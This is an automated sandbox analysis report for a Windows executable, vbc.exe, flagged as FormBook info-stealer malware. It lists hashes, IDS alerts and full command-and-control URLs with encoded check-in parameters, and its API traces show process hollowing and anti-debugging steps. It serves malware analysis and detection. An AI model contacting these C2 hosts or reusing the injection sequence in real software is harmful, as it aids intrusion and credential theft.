popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

vbc.exe

  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 April 14, 2021, 7:57 a.m. April 14, 2021, 7:59 a.m.
Size 364.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 6cf0200d66b943e0c41ce00807ffe6c8
SHA256 9d2688c35966c4ba68ca34f8274f34e6bc5e0e62e1d40ce4a3073149e841d8b4
CRC32 D718D713
ssdeep 6144:43yAPECLO4dK/eNvPosSj3nBXDoA35F/hH6NCSfUEne2:43yAf8eNvrSTnVDoA35F/hYVe
Yara
  • PE_Header_Zero - PE File Signature Zero
  • OS_Processor_Check_Zero - OS Processor Check Signature Zero
  • win_files_operation - Affect private profile
  • IsPE32 - (no description)
  • IsWindowsGUI - (no description)
  • IsPacked - Entropy Check
  • HasOverlay - Overlay Check

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49208 -> 34.102.136.180:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49218 -> 192.185.35.176:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49208 -> 34.102.136.180:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49218 -> 192.185.35.176:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49208 -> 34.102.136.180:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49218 -> 192.185.35.176:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49203 -> 104.21.86.40:80 2026887 ET INFO HTTP POST Request to Suspicious *.icu domain Potentially Bad Traffic
UDP 192.168.56.101:55450 -> 164.124.101.2:53 2026888 ET INFO DNS Query for Suspicious .icu Domain Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 104.21.86.40:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49204 -> 104.21.86.40:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49204 -> 104.21.86.40:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49210 -> 52.15.160.167:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49210 -> 52.15.160.167:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49210 -> 52.15.160.167:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49212 -> 184.168.131.241:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49212 -> 184.168.131.241:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49212 -> 184.168.131.241:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49214 -> 35.186.238.101:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49214 -> 35.186.238.101:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49214 -> 35.186.238.101:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49220 -> 103.149.26.92:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49220 -> 103.149.26.92:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49220 -> 103.149.26.92:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49216 -> 34.102.136.180:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49216 -> 34.102.136.180:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49216 -> 34.102.136.180:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49206 -> 210.152.86.230:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49206 -> 210.152.86.230:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49206 -> 210.152.86.230:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
section .wuxer
section .cowubag
section .new
resource name None
suspicious_features GET method with no useragent header suspicious_request GET http://www.nyclgbxyi.icu/u6nq/?jfIXkD=UXYrmMJ4u/B1+0WUExyHbxAt0m6f2mslIKSkRRcWxo5onae3DrFHsgQkCsGRGM+FoeqLQIti&YPc=yVylp85xvxIXPV
suspicious_features GET method with no useragent header suspicious_request GET http://www.foivgohl.com/u6nq/?jfIXkD=YHvWfgyTeOO8vJz3Qr0CaGVWOjPM5DV68PGCAW/ufgQebwovY+nib4yut9ZTDzE2UXFvF8SK&YPc=yVylp85xvxIXPV
suspicious_features GET method with no useragent header suspicious_request GET http://www.drinkjoisi.com/u6nq/?jfIXkD=HHLZx8uXdVEL5sIi4Qhl+dXD0XjsJeb2Y3TX8/ZiLqv3S+d10eFI57bZ+Tv9ScYahdp7TaH4&YPc=yVylp85xvxIXPV
suspicious_features GET method with no useragent header suspicious_request GET http://www.webgomo.com/u6nq/?jfIXkD=SJahp8ZgLKBLeEw+JP1CtZAjO/8RCCYuCYBr+ahXFSbTuZjNHmVgp8Kfz4Je2Pt/IjurR7iF&YPc=yVylp85xvxIXPV
suspicious_features GET method with no useragent header suspicious_request GET http://www.205southsignalstojai.com/u6nq/?jfIXkD=6KwRkc8GCQPM+S+o9hKUwrpx/IpjrLCdEWb8uFULZjP+PN2NkxQcmVQosxnw4NrdoJLUPJkh&YPc=yVylp85xvxIXPV
suspicious_features GET method with no useragent header suspicious_request GET http://www.legalopinion.guru/u6nq/?jfIXkD=D5mIrqti24HNtHmeGm2yPUY1hS7UiwTv12d5cjxJfuLLMvFCw4k9mM+pM/mMxbtRmkmPxt7v&YPc=yVylp85xvxIXPV
suspicious_features GET method with no useragent header suspicious_request GET http://www.kenkelconsulting.com/u6nq/?jfIXkD=ErxCIhrfUCX6Yp5sejZJtF+wo6Jo148aBDn7Fzy+yibKoXLFQcLoBP6k6zU4f2Fwwu1Afjl1&YPc=yVylp85xvxIXPV
suspicious_features GET method with no useragent header suspicious_request GET http://www.nubiaurquizopeluqueria.com/u6nq/?jfIXkD=hf/WfZBHYY4DdyGWkhub7RWq0Z7p5DE7Wbr3yBhKMx/2QIu4qyMRNQCZ6eRRdvBNtSfiWcZc&YPc=yVylp85xvxIXPV
suspicious_features GET method with no useragent header suspicious_request GET http://www.xn--3bss1rzz1apulk7k.com/u6nq/?jfIXkD=R4wRqmGFPjH8JAb+A8lzOmKJPejSdwbfE+Ot6R13XYj1gCI5taOp9+IDE08PqvW/QAI/rZfv&YPc=yVylp85xvxIXPV
request POST http://www.nyclgbxyi.icu/u6nq/
request GET http://www.nyclgbxyi.icu/u6nq/?jfIXkD=UXYrmMJ4u/B1+0WUExyHbxAt0m6f2mslIKSkRRcWxo5onae3DrFHsgQkCsGRGM+FoeqLQIti&YPc=yVylp85xvxIXPV
request POST http://www.foivgohl.com/u6nq/
request GET http://www.foivgohl.com/u6nq/?jfIXkD=YHvWfgyTeOO8vJz3Qr0CaGVWOjPM5DV68PGCAW/ufgQebwovY+nib4yut9ZTDzE2UXFvF8SK&YPc=yVylp85xvxIXPV
request POST http://www.drinkjoisi.com/u6nq/
request GET http://www.drinkjoisi.com/u6nq/?jfIXkD=HHLZx8uXdVEL5sIi4Qhl+dXD0XjsJeb2Y3TX8/ZiLqv3S+d10eFI57bZ+Tv9ScYahdp7TaH4&YPc=yVylp85xvxIXPV
request POST http://www.webgomo.com/u6nq/
request GET http://www.webgomo.com/u6nq/?jfIXkD=SJahp8ZgLKBLeEw+JP1CtZAjO/8RCCYuCYBr+ahXFSbTuZjNHmVgp8Kfz4Je2Pt/IjurR7iF&YPc=yVylp85xvxIXPV
request POST http://www.205southsignalstojai.com/u6nq/
request GET http://www.205southsignalstojai.com/u6nq/?jfIXkD=6KwRkc8GCQPM+S+o9hKUwrpx/IpjrLCdEWb8uFULZjP+PN2NkxQcmVQosxnw4NrdoJLUPJkh&YPc=yVylp85xvxIXPV
request POST http://www.legalopinion.guru/u6nq/
request GET http://www.legalopinion.guru/u6nq/?jfIXkD=D5mIrqti24HNtHmeGm2yPUY1hS7UiwTv12d5cjxJfuLLMvFCw4k9mM+pM/mMxbtRmkmPxt7v&YPc=yVylp85xvxIXPV
request POST http://www.kenkelconsulting.com/u6nq/
request GET http://www.kenkelconsulting.com/u6nq/?jfIXkD=ErxCIhrfUCX6Yp5sejZJtF+wo6Jo148aBDn7Fzy+yibKoXLFQcLoBP6k6zU4f2Fwwu1Afjl1&YPc=yVylp85xvxIXPV
request POST http://www.nubiaurquizopeluqueria.com/u6nq/
request GET http://www.nubiaurquizopeluqueria.com/u6nq/?jfIXkD=hf/WfZBHYY4DdyGWkhub7RWq0Z7p5DE7Wbr3yBhKMx/2QIu4qyMRNQCZ6eRRdvBNtSfiWcZc&YPc=yVylp85xvxIXPV
request POST http://www.xn--3bss1rzz1apulk7k.com/u6nq/
request GET http://www.xn--3bss1rzz1apulk7k.com/u6nq/?jfIXkD=R4wRqmGFPjH8JAb+A8lzOmKJPejSdwbfE+Ot6R13XYj1gCI5taOp9+IDE08PqvW/QAI/rZfv&YPc=yVylp85xvxIXPV
request POST http://www.nyclgbxyi.icu/u6nq/
request POST http://www.foivgohl.com/u6nq/
request POST http://www.drinkjoisi.com/u6nq/
request POST http://www.webgomo.com/u6nq/
request POST http://www.205southsignalstojai.com/u6nq/
request POST http://www.legalopinion.guru/u6nq/
request POST http://www.kenkelconsulting.com/u6nq/
request POST http://www.nubiaurquizopeluqueria.com/u6nq/
request POST http://www.xn--3bss1rzz1apulk7k.com/u6nq/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 131072
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03e7c000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 172032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1772
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00880000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
section {u'size_of_data': u'0x00049400', u'virtual_address': u'0x00001000', u'entropy': 7.50402962764412, u'name': u'.text', u'virtual_size': u'0x0004938f'} entropy 7.50402962764 description A section with a high entropy has been found
entropy 0.808275862069 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 1772
region_size: 163840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000080
1 0 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 1772
process_handle: 0x00000080
1 1 0
Process injection Process 1108 called NtSetContextThread to modify thread in remote process 1772
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4313072
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000007c
process_identifier: 1772
1 0 0
Process injection Process 1108 resumed a thread in remote process 1772
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x0000007c
suspend_count: 1
process_identifier: 1772
1 0 0
Bkav W32.AIDetect.malware1
Elastic malicious (high confidence)
FireEye Generic.mg.6cf0200d66b943e0
Cylance Unsafe
Sangfor Trojan.Win32.Save.a
K7GW Riskware ( 800800801 )
Cybereason malicious.85074c
BitDefenderTheta Gen:NN.ZexaF.34670.wCX@amS1cOpG
Cyren W32/Kryptik.DVD.gen!Eldorado
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/Kryptik.HKJF
APEX Malicious
Kaspersky UDS:Trojan-Spy.Win32.Noon
Paloalto generic.ml
Rising Malware.Heuristic!ET#81% (RDMK:cmRtazr9p0+3Wm1C5UjDuMeyISeT)
McAfee-GW-Edition BehavesLike.Win32.Trojan.fc
Sophos ML/PE-A
Ikarus Backdoor.Win32.Kredoor
Microsoft Trojan:Win32/Wacatac.B!ml
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win.MalPE.R415606
Acronis suspicious
McAfee Artemis!6CF0200D66B9
Tencent Win32.Trojan.Inject.Auto
SentinelOne Static AI - Malicious PE
Fortinet W32/GenKryptik.FDXJ!tr
CrowdStrike win/malicious_confidence_80% (D)
Qihoo-360 HEUR/QVM10.1.8AC7.Malware.Gen
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 1824
thread_handle: 0x0000007c
process_identifier: 1772
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\vbc.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\vbc.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\vbc.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000080
1 1 0

NtGetContextThread

 thread_handle: 0x0000007c
1 0 0

NtUnmapViewOfSection

 base_address: 0x00400000
region_size: 4096
process_identifier: 1772
process_handle: 0x00000080
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1772
region_size: 163840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000080
1 0 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 1772
process_handle: 0x00000080
1 1 0

NtSetContextThread

 registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4313072
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000007c
process_identifier: 1772
1 0 0

NtResumeThread

 thread_handle: 0x0000007c
suspend_count: 1
process_identifier: 1772
1 0 0